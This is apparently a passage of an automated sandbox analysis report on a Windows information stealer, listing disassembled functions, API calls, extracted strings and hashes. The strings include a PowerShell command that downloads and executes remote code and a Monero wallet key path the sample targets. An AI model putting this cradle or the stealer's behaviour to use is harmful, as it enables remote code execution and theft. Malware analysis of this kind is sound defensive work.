                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 6aa2c418ec12c3da4a0774eda094eb0399f0f4d107ce17fffa25de4f96cef5f9
                          • Instruction ID: 9ada7859297bb5e97547787359bd45474a603599975f419457040e919f050147
                          • Opcode Fuzzy Hash: 6aa2c418ec12c3da4a0774eda094eb0399f0f4d107ce17fffa25de4f96cef5f9
                          • Instruction Fuzzy Hash: E90167B5A04304BFDB04DBE4EC99FAD7BB9FB48702F104154FA04D7290D67499048F51
                          Function 00627720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0062773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0110BF30,00000000,00020119,006276B9), ref: 0062775B
                          • RegQueryValueExA.ADVAPI32(006276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0062777A
                          • RegCloseKey.ADVAPI32(006276B9), ref: 00627784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 25ad549550cb23d35099ce7ef3f40316c9f88a78dfb9069e191071de09e61f0d
                          • Instruction ID: b556ab90e389b37492019670c4fe6127b912fe4ad31c324f02cbadca36ccf053
                          • Opcode Fuzzy Hash: 25ad549550cb23d35099ce7ef3f40316c9f88a78dfb9069e191071de09e61f0d
                          • Instruction Fuzzy Hash: 5A0167B5A40308BFDB04DFE4DC89FAEBBB9FB48702F104258FA05A7281D67455008F51
                          Function 006292E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(:b,80000000,00000003,00000000,00000003,00000080,00000000,?,00623AEE,?), ref: 006292FC
                          • GetFileSizeEx.KERNEL32(000000FF,:b), ref: 00629319
                          • CloseHandle.KERNEL32(000000FF), ref: 00629327
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID: :b$:b
                          • API String ID: 1378416451-696514854
                          • Opcode ID: 1a50287dfb9704e5f07c55c1454a44e4436cd4273c2cc6e589a721059ba1bce1
                          • Instruction ID: 53252c7a0dd57a6b5335f6a4cd53653f69116142474f799209a96e0d0f28550f
                          • Opcode Fuzzy Hash: 1a50287dfb9704e5f07c55c1454a44e4436cd4273c2cc6e589a721059ba1bce1
                          • Instruction Fuzzy Hash: 75F03C35E40308BBDF14DBB0EC49B9E77FABB88711F108254B651A72C0D67596018F50
                          Function 006240B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 006240D5
                          • RegOpenKeyExA.ADVAPI32(80000001,0111DC20,00000000,00020119,?), ref: 006240F4
                          • RegQueryValueExA.ADVAPI32(?,0111E3F8,00000000,00000000,00000000,000000FF), ref: 00624118
                          • RegCloseKey.ADVAPI32(?), ref: 00624122
                          • lstrcat.KERNEL32(?,00000000), ref: 00624147
                          • lstrcat.KERNEL32(?,0111E3C8), ref: 0062415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: 36a515a2010c17e80265d65de5e3810e29c8d5eaaf01edbd98a46ccd68b50d1b
                          • Instruction ID: 834dbc5d1d89e0981bfa3fc91688b455700f4e2e6a3cced963cf4effcfe6001b
                          • Opcode Fuzzy Hash: 36a515a2010c17e80265d65de5e3810e29c8d5eaaf01edbd98a46ccd68b50d1b
                          • Instruction Fuzzy Hash: 2141A9B6D002186BDB18EBA0EC96FFD773EBB4C300F00455CB71657181EA795B888B92
                          Function 006199C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                          • LocalFree.KERNEL32(0061148F), ref: 00619A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: ec490600a25d0e92bd36a6e9f1445f88033a35be7301637fb12755a3a1317554
                          • Instruction ID: 67387405b91db84c86c015f0eb80463741770d56d8719a20cb84cc463b5db923
                          • Opcode Fuzzy Hash: ec490600a25d0e92bd36a6e9f1445f88033a35be7301637fb12755a3a1317554
                          • Instruction Fuzzy Hash: B83128B4A00209EFDB14CF94D895BEE7BB6FF48301F108158E911A7390D779AA85CFA1
                          Function 0062C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: 4560d17a78e46be9d9d12481ec778be5b864762e71ec98b4c0f6b833c78d5f16
                          • Instruction ID: 9b187b4b14c691682300a9dca9336d96062e0961a0b05b62625f389a72569fc0
                          • Opcode Fuzzy Hash: 4560d17a78e46be9d9d12481ec778be5b864762e71ec98b4c0f6b833c78d5f16
                          • Instruction Fuzzy Hash: 504125B1500BAC5EDB218B249C84FFFBBEA9F05714F1444ECE98A86182D2719A859F64
                          Function 00624780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,0111E1B8), ref: 006247DB
                            • Part of subcall function 00628DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00628E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00624801
                          • lstrcat.KERNEL32(?,?), ref: 00624820
                          • lstrcat.KERNEL32(?,?), ref: 00624834
                          • lstrcat.KERNEL32(?,0110B9F0), ref: 00624847
                          • lstrcat.KERNEL32(?,?), ref: 0062485B
                          • lstrcat.KERNEL32(?,0111DCC0), ref: 0062486F
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 00628D90: GetFileAttributesA.KERNEL32(00000000,?,00611B54,?,?,0063564C,?,?,00630E1F), ref: 00628D9F
                            • Part of subcall function 00624570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00624580
                            • Part of subcall function 00624570: RtlAllocateHeap.NTDLL(00000000), ref: 00624587
                            • Part of subcall function 00624570: wsprintfA.USER32 ref: 006245A6
                            • Part of subcall function 00624570: FindFirstFileA.KERNEL32(?,?), ref: 006245BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 55899364d546cda08677f5daa98b0f29418202c041b946a7d89204fe5bb8b514
                          • Instruction ID: 5711b3852efc0205b402a5e2a0a0de1d8a579913244eeed17ebee4084efaf9e3
                          • Opcode Fuzzy Hash: 55899364d546cda08677f5daa98b0f29418202c041b946a7d89204fe5bb8b514
                          • Instruction Fuzzy Hash: 583160B29003186BCB54FBA0EC86EED7379BB48700F40459DB31996081EE7496C98F99
                          Function 00622C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00622D85
                          Strings
                          • <, xrefs: 00622D39
                          • ')", xrefs: 00622CB3
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00622D04
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00622CC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: d2c6c227b6d2a05191401b8d7ce0c54e231b19f676802a418b8ba729c6530a1b
                          • Instruction ID: 6a12e08db6a697900017118d671f77bbe0a88806f397dd09b56be44578f3b9a4
                          • Opcode Fuzzy Hash: d2c6c227b6d2a05191401b8d7ce0c54e231b19f676802a418b8ba729c6530a1b
                          • Instruction Fuzzy Hash: AD41CD71D106189BDB54EBE0E892BDDBB76AF14300F40411DE006A7191DFB46A8ACF9A
                          Function 00619E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00619F41
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 068be4b6e0b5c29062270f3d4763d29ce3147848f166f640f0fc210196a9e233
                          • Instruction ID: bf8320a8d6c513d966d7557860b4979170e3576ce27b408e036934567644a9ca
                          • Opcode Fuzzy Hash: 068be4b6e0b5c29062270f3d4763d29ce3147848f166f640f0fc210196a9e233
                          • Instruction Fuzzy Hash: F3615F70A00258ABDB64EFA4DC96FED7776AF45304F048018F90A5F181EBB46A46CB96
                          Function 006270D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • memset.MSVCRT ref: 0062716A
                          Strings
                          • sb, xrefs: 006272AE, 00627179, 0062717C
                          • sb, xrefs: 00627111
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0062718C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemset
                          • String ID: sb$sb$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 4047604823-3334931456
                          • Opcode ID: ad23d17b63413c828a358a4f13c4fcf7f3597f919f95f48500d70892adfce2ee
                          • Instruction ID: 1e2f94d168b2210a52793d2b5d448fc32dba647d028fa9a4df3ab23d70b84ff8
                          • Opcode Fuzzy Hash: ad23d17b63413c828a358a4f13c4fcf7f3597f919f95f48500d70892adfce2ee
                          • Instruction Fuzzy Hash: 5E516EB0D04628DBDB64EB90EC95FEEB376AF54304F2440ACE50566281EB746E88CF59
                          Function 00627E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0110C320,00000000,00020119,?), ref: 00627E5E
                          • RegQueryValueExA.ADVAPI32(?,0111DC80,00000000,00000000,000000FF,000000FF), ref: 00627E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00627E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
